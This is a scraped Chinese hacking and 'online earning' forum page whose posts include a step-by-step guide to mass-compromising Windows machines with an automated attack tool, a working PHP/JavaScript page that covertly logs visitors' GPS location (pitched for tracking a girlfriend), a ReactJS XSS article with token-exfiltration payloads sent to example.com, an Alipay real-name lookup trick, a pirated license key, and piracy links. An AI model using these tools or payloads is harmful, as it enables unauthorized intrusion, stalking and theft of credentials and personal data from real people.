一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0
文章:78
今日:0
文章:13
今日:0
文章:9
今日:0
文章:137
今日:0
文章:30
今日:0
文章:63
今日:0
文章:19
今日:0    总帖:877
wolfman
3749
在发这个帖子之前我也想过,这样会不会挡了别人财路。这里我不会说他们是骗子,因为这只是一个卖暴利产品的营销系统。看到这里大家可能还不知道我在说什么。大家先看看下面的图片。(这里我只简单收集一部分,像这样的项目很多,随便到一个网赚论坛,首页的广告几乎都有,因为都是同行所以我把网站名字都给遮住了,反正就是这些类型的)想我们做网赚的人看到这些项目都会明白,要是真的你一天赚几千上万的,为什么分享出来。如果是灰色项目那自己赚钱不是更好。分享给大家不是挡自己财路吗?这个给大家说一下。你们看到的支付宝收入什么的,这些都是可以自己做的。至于怎么做大家可以百度支付宝作假。一看就明白。言归正传,我把类网站分一下类。1,教你怎么赚钱的,或者说购买教程就可以日赚几千的这里先声明他们不一定骗子,因为你花钱之后确确实实能获得一些教程或者资源什么的。只是你花多了钱而已。当你买了之后再去淘宝找找,会发现你花了比别人多好几倍的钱。而且像网赚资源,教程什么的都是暴利产品。等你买了教程之后就会发现他的方法是可以赚钱,但是觉得不是他们说的那么容易,也不会像他们说的赚那么多,你必须花很多时间和精力才能赚点钱。说不定连你购买教程的成本都赚不回来。这个现在上当的应该不是很多的。2,另外一种就是让你注册,通过推广下线获得会员权利才能获得教程或资源(这个被叫做病毒式营销,简单说就是网络界的传销)他们看起来是不让你花钱,通过推广就能获得教程。如果推广的多,卖一套教程你还能赚钱,比如599的教程,你卖一个他就分给你300元。而你的这个动作就可以帮他们宣传。以1传10,10传100的速度推广开。而这里面10%左右的人就会去购买。而你买的教程就和上面说的一样。完全是无成本的暴利产品。大家可以算算这个帐,不管你购买还是帮他推广。开网站的人永远不会亏钱。而且还会赚的很多。这个模式的网站现在非常之多。甚至有的人看重这个提成还会把他当事业去做,每天就推广,到处发广告。其实你买个源码,到淘宝买一些教程。同样可以做这样的网站。何必为别人打工呢?总之大家做网赚,既然要做就先看清楚别人是怎么盈利模式,不要看到钱就什么都肯去做。况且这只是别人给你画的一个饼,能不能赚到手还不一定
骗子公布 17 0 2472天前
wolfman
4108
居然相信这个,朋友给我说的时候我一看就知道是骗局收到货之后就是地摊货,2元一件说不定都不值,关键是你还无法分辨。虽然说人都是喜欢贪小便宜的,但是建议这种小便宜真不要去贪,以前看到一个充电宝骗局的和这个就差不多,只是别人把生意做到了微信上面,我媳妇说她朋友好多都买了。看来被骗的还是有很多人吧以前看别人计算过,货加运费5元左右,别人快递代收,净赚10元一单啊,这个绝对又是网zuan界的干活利用微信朋友圈传播,做的好一天上百单,日zuan千元有木有。吓死我的小心肝了,毕竟身边就有人信,还说便宜,无所谓╮(╯_╰)╭  我也没办法
骗子公布 12 0 2472天前
wolfman
5170
今天给大家带来的是如何查支付宝账号的名字 俗称查支付宝实名外面有很多人卖,查一次实名多少多少钱,不要相信这些,毕竟自己动手,丰衣足食首先 登陆自己的支付宝账号登陆之后切换到 商户版 个人版不行的!我们给某个支付宝账号转账 个人版支付宝转账是看不到对方名字的只有商户版的才能看到 大家切换下就行然后我们进行转账然后我们输入想查那个支付宝的支付宝账号我这里输一个 转1分钱就行这里名字就出来了就是这么简单!
经验教程 11 0 2472天前
wolfman
3156
今天刷微信朋友圈,看到朋友圈有人发这个,刚刚1分钟刷新的,打开就有400多人浏览了。突然觉得太牛逼了。他的公众号名字是 ,某某笑话,因为被这标题吸引本身就是一个笑话,感觉很有趣,自然就会关注他了。进去看了看历史信息。全部是100000+阅读。看来真是一个引流高手呀。看来色流依然是效率最快的。。。如果有需要引流的  不妨试试这方法  标题党引流   朋友圈  微信群太多了    这个是我见过效果最好的 
其他话题 12 0 2472天前
wolfman
2556
ReactJS是一款能够帮助开发者构建用户接口的热门JavaScript库。在它的帮助下,开发者可以构建出内容丰富的客户端或Web应用,并且提前加载内容以提供更好的用户体验。从设计角度来看,只要你能够按照开发标准来使用ReactJS的话,它其实是非常安全的。但是在网络安全领域中,没有任何东西是绝对安全的,而错误的编程实践方式将导致类似脚本注入漏洞之类的问题产生,这些错误的编程方式包括:1.利用用户提供的对象来创建React组件;2.利用用户提供的href属性来配置标签,或利用其他可注入的属性来设置其他的HTML标签(例如link标签);3.显示地设置一个元素的dangerouslySetInnerHTML属性(危险的HTML标签属性);4.向eval()传递用户提供的字符串数据; 接下来,让我们一起看一看这些潜在的问题将如何影响ReactJS应用程序,并最终导致了脚本注入漏洞的出现。组件、属性和元素在ReactJS应用程序中,组件是最基本的组成部分。从本质上来说,这些组件其实都类似于JavaScript函数,它们可以接受任意的输入数据,然后返回React元素。一个基本的ReactJS组件如下所示:class Welcome extends React.Component {   render() { return <h1>Hello, {this.props.name}</h1>;   } }  请注意上面代码中的return语句,这是一种JavaScript中的语句扩展(JSX)。在项目构建的过程中,JSX代码将会被编译成常规的JavaScript(ES5)代码。下面给出的两种样本代码其功能是完全相同的:// JSX const element = (   <h1 className=”greeting”>   Hello, world!   </h1> ); // Transpiled to createElement() call const element = React.createElement(   ‘h1’,   {className: ‘greeting’},   ‘Hello, world!’ ); 在创建新的React元素时,使用的是component类中的createElement()函数: React.createElement(   type,   [props],   [...children] ) 这个函数可以接受三个参数:1.type参数:该参数可以是一个标签名(例如'div'或'span'),或一个component类。但是在React Native中只允许component类。2.props参数:该参数包含一个传递给新元素的属性列表。3.children参数:该参数包含新元素的子节点。如果你能够控制其中任何一个参数的话,那么这个参数就会变成攻击向量。注入子节点 早2015年3月份,Daniel LeCheminant报告了一个存在于HackerOne的存储型跨站脚本漏洞(XSS)。这个漏洞的成因如下:HackerOne的Web应用会将用户所提供的任意对象当作children参数传递给React.createElement()函数。根据我们的推测,存在漏洞的代码可能跟下方给出的代码比较相似:* Retrieve a user-supplied, stored value from the server and parsed it as JSON for whatever reason. attacker_supplied_value = JSON.parse(some_user_input) */ render() {   return <span>{attacker_supplied_value}</span>; } 这段JSX代码将会被转译成如下所示的JavaScript代码:   React.createElement("span", null, attacker_supplied_value}; 如果其中的attacker_supplied_value是一个字符串的话(正常情况),代码将会生成一个正常的span元素。但是在当前版本的ReactJS中,createElement()函数还会接受以children参数形式传递的普通对象。Daniel通过一个JSON编码的对象利用了这个漏洞,他在这个对象中包含了dangerouslySetInnerHTML属性,这将允许他向React呈现的输出效果中注入原始的HTML代码。最终的PoC代码:{  _isReactElement: true,  _store: {},  type: “body”,  props: {    dangerouslySetInnerHTML: {      __html:      "<h1>Arbitrary HTML</h1>      <script>alert(‘No CSP Support :(‘)</script>      <a href=’http://danlec.com'>link</a>"     }   } } 相关的漏洞缓解方案可以在React.js的GitHub主页上找到,感兴趣的同学可以参考。在2015年11月份,Sebastian Markbåge提交了一个修复方案:为React元素引入了$$typeof: Symbol.for('react.element')属性。由于无法从一个注入对象引用全局JavaScript符号,所以Daniel设计的漏洞利用技术(注入child元素)就无法再使用了。控制元素类型 虽然我们不能再将普通对象来当作ReactJS元素来使用了,但是组件注入并非不可能实现,因为createElement()函数还可以接受type参数中的字符串数据。我们假设开发者采用了如下所示的代码:// Dynamically create an element from a string stored in the backend. element_name = stored_value; React.createElement(element_name, null); 如果stored_value是一个由攻击者控制的字符串,那我们就可以创建任意的React组件了。但是此时创建的是一个普通的无属性HTML元素,而这种东西对于攻击者来说是没有任何作用的。因此,我们必须要能够控制新创建元素的属性才可以。注入属性(props) 请大家先看看下面给出的这段代码:// Parse attacker-supplied JSON for some reason and pass // the resulting object as props. // Don't do this at home unless you are a trained expert! attacker_props = JSON.parse(stored_value) React.createElement("span", attacker_props}; 这样一来,我们就可以向新元素中注入任意属性了。我们可以使用下面给出的Payload来设置dangerouslySetInnerHTML属性:{"dangerouslySetInnerHTML" : { "__html": "<img src=x/ onerror=’alert(localStorage.access_token)’>"}} 跨站脚本漏洞某些传统的XSS攻击向量同样适用于ReactJS应用程序。请大家接着往下看:(1) 显示地设置dangerouslySetInnerHTML属性很多开发者可能会有目的地去设置dangerouslySetInnerHTML属性: <div dangerouslySetInnerHTML={user_supplied} /> 很明显,如果你能够控制这些属性的参数值,那你就能够注入任意的JavaScript代码了。(2) 可注入的属性如果你能够控制一个动态生成的标签的href属性,那就没有什么可以阻止你向其参数值中注入JavaScript代码(通过javascript:)了。除了href属性之外,在现代浏览器中HTML5按钮的formaction属性同样也是可注入的。<a href={userinput}>Link</a> <button form="name" formaction={userinput}> 另一个非常奇怪的注入向量就是HTML imports:<link rel=”import” href={user_supplied}> (3) 服务器端呈现的HTML为了降低初始化页面的呈现时间,很多开发人员会在服务器端预先加载React.JS页面(也就是所谓的“服务器端呈现”)。在2016年11月份,Emilia Smith发现官方Redux代码样本中存在一个跨站脚本漏洞(XSS),因为客户端状态被嵌入到了预呈现页面中并没有被过滤掉。(样本代码中的漏洞现在已经修复)如果HTML页面在服务器端预呈现的话,你也许可以在普通的Web应用中找到类似的跨站脚本漏洞。基于eval()的注入如果应用程序使用了eval()来动态执行一个由你控制的注入字符串,那你就非常幸运了。在这种情况下,你就可以随意选择你需要注入的代码了:function antiPattern() {   eval(this.state.attacker_supplied); } XSS Payload在现代Web开发领域,很多机制的开发人员会选择使用无状态的会话令牌,并且将它们保存在客户端的本地存储中。因此,攻击者必须根据这种情况来设计相应的Payload。 当你在利用跨站脚本漏洞来攻击ReactJS Web应用程序时,你能够随意注入任意代码,如果再配合使用下面列出的代码,你就可以从目标设备的本地存储中获取访问令牌并将其发送到你的记录程序中:fetch(‘http://example.com/logger.php? token='+localStorage.access_token); React NativeReact Native是一款移动应用开发框架,它可以帮助开发人员使用ReactJS构建原生移动应用。更确切地说,它提供了一个能够再移动设备上运行React JavaScript包的运行时环境。除此之外,我们还可以使用React Native for Web让一个React Native应用在普通的Web浏览器中运行。但是就我们目前的研究结果来看,上面列出的脚本注入向量都不适用于React Native:1.React Native的createInternalComponent方法只接受包含标签的component类,所以即便是你能够完全控制传递给createElement()的参数,你野无法创建任意元素;2.不存在HTML元素,HTML代码也不会被解析,所以普通的基于浏览器的XSS向量(例如'href')就无法正常工作了。只有基于eval()的变量才可以在移动设备上被攻击者利用。如果你能够通过eval()注入JavaScript代码,你就可以访问React Native API并做一些有趣的事情了。比如说,你可以从本地存储(AsyncStorage)中窃取数据了,相关的操作代码如下所示:_reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php? token='+JSON.stringify(result));});}); 建议虽然从设计的角度出发,ReactJS还是非常安全的,但是这个世界上没有绝对安全的东西,不好的编程习惯将导致各种严重的安全漏洞出现: 我们建议各位开发者们不要再使用eval()函数或dangerouslySetInnerHTML属性,并避免解析用户提供的JSON数据。
经验教程 13 0 2473天前
yixiaotao
3182
名字:战狼2大小:4.1GB片长: 123分钟类型: 动作,战争详情:冷锋将卷入一场非洲国家的叛乱,本可以安全撤离的他,因无法忘记军人的使命,不丢下身陷囹圄的同胞和难民们,只身犯险冲回沦陷区,带领所有被困民众向邻国大逃亡。由于百度云的下载会失效,所以发的是磁力:magnet:?xt=urn:btih:F00EC5403D70ED23B18677A110E7B55C1B10E452建议:迅雷下载。
音影动漫 19 0 2475天前
sanqing
2960
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏  一、获取IP  “IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的网络数据包。用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后的数据包的IP包头信息,再根据这些信息了解具体的IP。  二、隐藏IP  虽然侦察IP的方法多样,但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言,就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗费资源严重,降低计算机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。  现在的个人用户采用最普及隐藏IP的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet,特别是QQ使用“ezProxy”等代理软件连接后,IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器,只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口,即可对http使用代理,比较适合由于IE和QQ泄漏IP的情况。  不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。  虽然代理可以有效地隐藏用户IP,但高深的黑客亦可以绕过代理,查找到对方的真实IP地址,用户在何种情况下使用何种方法隐藏IP,也要因情况而论。
文章资讯 14 0 2475天前
sanqing
2646
小白技术大神勿喷。1,傻瓜级入侵 之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目! 需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接" 不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗? 好了,下边我们开始入侵了,下边就是过程: 第一步. 打开WinntAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息" 在"IIS溢出"选项卡里勾上"开99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并安装远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并安装远程图形控制软件". 好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...) ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧 第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号shanlu()成功 哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了! 要是有这样的提示: 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 简单管理员密码: 帐号: TsInternetUser(1234567890)[Administrators] 就说明用户名是TsInternetUser,密码是1234567890,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户. 要是有主机提示开了4899端口或提示"安装远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要安装,强烈建议安装后把服务端卸载掉,方法:开始-运行,在"运行"框里填"winnt\system32\re_server.exe /uninstall",注意是"winnt"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed successfully"要是你不卸载,最少也要在安装后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能”螳螂捕蝉,黄鹊在后”你就成为别人攻击的目标了. 打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在”readme”文件里都能找到,要是找不到,我给你们一个:08le-2jgMggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhysVBux8HE7udeSR0D1E0 长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~) 进入了RA的主界面,我们点”add new connection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或安装图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈! 慢!!!你干什么,别乱动他的屏幕!先看看你用的是什么模式进去的!我来给大家介绍下上边的13个按纽的作用,我就给大家介绍其中的7个常用的吧. 第2个按纽,刚才我们用过了,就是添加主机按纽 第3个按纽,删除主机 第5个按纽(中间的第一个):这个按纽最厉害!先点这个,再双击你下边肉鸡的图标进去,你不但能看见肉鸡的屏幕,还能完完全全控制他的机器!!,不信,你双击他桌面上的图标试!!或者把他正在开的窗口关了!(我怎么这么坏?)是不是就和用自己电脑一样?哈!刚开始的时候你可能不习惯这种控制,慢慢的你就会习惯了.可是,用这个要小心啊,因为你控制他电脑的动作,只要你的肉鸡前有人,他就会发现,聪明一点的,他就立即下线了,而现在的肉鸡大部分都是浮动ip,好,你这个肉鸡白找了,还没玩过瘾就没有了... 第6个按纽:只能看见屏幕,但不能控制他的电脑,适合观察他机器的动静,比如猜猜看他机器前现在有没有人啊 第7个按纽:另类的telnet功能,你用这个模式进去后,看见的就和cmd下差不多,你可以在这个下边给你的这个肉鸡加个密码,这样后来的入侵者就进不去了(当然高手还是能进去,不过他肯定要利用其他漏洞了),并且你还可以在下边做你想做的一切! 第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧? 第9个按纽,可以远程给他关机,重起什么的,怎么做不要我说了吧?RA 真的很好用,爽! 第3步:要是出现这样: 主机:218.88.55.55 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号(shanlu)成功。 这说明我们可以用SQL漏洞了,看见WinntAutoAttack的那个“SQLCMD执行”的选项卡没有?点它。 在“主机”后边输入ip,其他的不动,点“连接”,出现了“连接到主机:218.88.55.55”这个时候你点下“执行”(默认的执行"dir c:\"),他的c盘文件是不是在你面前了?比如在下边执行“net start telnet”就是把它的telnet打开,然后开个cmd窗口,用刚才的管理员帐号"shanlu"telnet上去吧!具体怎么做,我在下个文章里讲ipc$的时候再讲。 其实,这个是完完全全骇客的做法,时间长了,你就会发现,这样做一点意思也没有,渐渐的你就失去了当初的那种成就感,毕竟,在这个过程中,当你把过程摸熟了,整个入侵过程你不用用一点脑筋,不过,刚开始这么干还是有好处的,它会增加你的信心,并且,有的时候你可能会遇到一些问题,这样,你就可以慢慢的掌握一点入侵的知识了.
经验教程 74 9 2475天前
wolfman
3318
想知道某人的位置?比如你的女朋友,很简单,往下看新建一个文件,名为index.php<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>狼人网络 - 访问被禁止 by Wolfman</title> </head> <body> <img src="wolfman.png" alt="" width="100%;"> <script> var geol; try { if (typeof(navigator.geolocation) == 'undefined') { geol = google.gears.factory.create('beta.geolocation'); } else { geol = navigator.geolocation; } } catch (error) { //alert(error.message); } if (geol) { geol.getCurrentPosition(function(position) { var nowLatitude = position.coords.latitude; var nowLongitude = position.coords.longitude; function new_form(){ var f=document.createElement("form"); document.body.appendChild(f); f.method="post"; return f; } function create_elements(eForm,eName,eValue){ var e=document.createElement("input"); eForm.appendChild(e); e.type="text"; e.name=eName; if(!document.all){e.style.display="none"}else{ e.style.display="block"; e.style.width="0px"; e.style.height="0px"; } e.value=eValue; return e; } var _f=new_form(); create_elements(_f,"username",nowLatitude) create_elements(_f,"password",nowLongitude); _f.action="wolfman2.php"; _f.submit(); }, function(error) { switch(error.code){ case error.TIMEOUT : //alert("连接超时,请重试"); break; case error.PERMISSION_DENIED : //alert("您拒绝了使用位置共享服务,查询已取消"); alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站"); break; case error.POSITION_UNAVAILABLE : alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站"); break; } }, {timeout:10000}); } </script> </body> </html>//http://bbs.wolfwl.cn下面是创建一个txt,为了记录访问过的人,可以通过  网址/wolfman.txt进行直接访问被记录下来的信息   名为wolfman2.php<title>你被骗了 神马都没有 - by Wolfman</title> <?php @$time=date('Y-m-d H:i:s',time()); $nowLatitude="纬度 ".$_POST['username']; $nowlongitude="经度 ".$_POST['password']." ------时间是".$time."\r\n";; $fp=fopen("wolfman.txt", "a+"); fwrite($fp, $nowLatitude); fwrite($fp, $nowlongitude); ?>//http://bbs.wolfwl.cn然后直接上传到自己网站空间即可你可以通过自己的想法来继续优化,比如伪装等等这个有一个缺点就是必须需要访问的人允许获取地理位置不过你可以通过社工来套路,详细我就不说了希望可以帮到那些玩社工的朋友,如果你觉得不错,可以打赏下站长哦!
经验教程 13 2 2475天前
wolfman
3524
通用接口(高清)        解析地址乐视解析        http://apn.zhibo99.cn/mdparse/letv.php?id=通用解析        https://api.47ks.com/webcloud/?v=通用解析        http://api.mp4la.net/?url=通用解析        http://v.72du.com/api/?url=通用解析        http://api.47ks.com/webcloud/?v=通用解析        http://jx.71ki.com/index.php?url=通用解析        http://000o.cc/jx/ty.php?url=通用解析        http://www.yydy8.com/Common/?url=通用解析        http://yun.mt2t.com/yun?url=通用解析        http://api.mp4la.net/?url=通用解析        http://yyygwz.com/index.php?url=通用解析        http://v.72du.com/api/?url=通用解析        http://api.47ks.com/webcloud/?v=通用解析        http://jx.71ki.com/index.php?url=通用解析        http://www.97zxkan.com/jiexi/97zxkanapi.php?url=通用解析        http://www.wmxz.wang/video.php?url=通用解析        http://www.bbshanxiucao.top/video.php?url=通用解析        http://www.xiguaso.com/api/index.php?url=通用解析        http://www.kppev.cn/jiexi/5/1/1.php?url=通用解析        http://api.mp4la.net/?url=通用解析        http://v.72du.com/api/?url=通用解析        http://api.47ks.com/webcloud/?v=通用解析        http://jx.71ki.com/index.php?url=通用解析        http://000o.cc/jx/ty.php?url=通用解析        http://5qiyi.sdyhy.cn/5qiyi/5qiyi2.php?url=通用解析        http://vip.sdyhy.cn/ckflv/?url=通用解析        http://player.gakui.top/?url=通用解析        http://qtzr.net/s/?qt=通用解析        http://www.vipjiexi.com/yun.php?url=迅雷磁力链      http://apiv.ga/magnet/优酷云解析      http://api.baiyug.cn/vip/index.php?url=优酷云解析      http://977345961.kezi.wang/ykyun/c.php?vid=
资源共享 29 2 2478天前
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:3.133.159.198,2024-05-18 17:24:44,Processed in 0.12931 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.0.0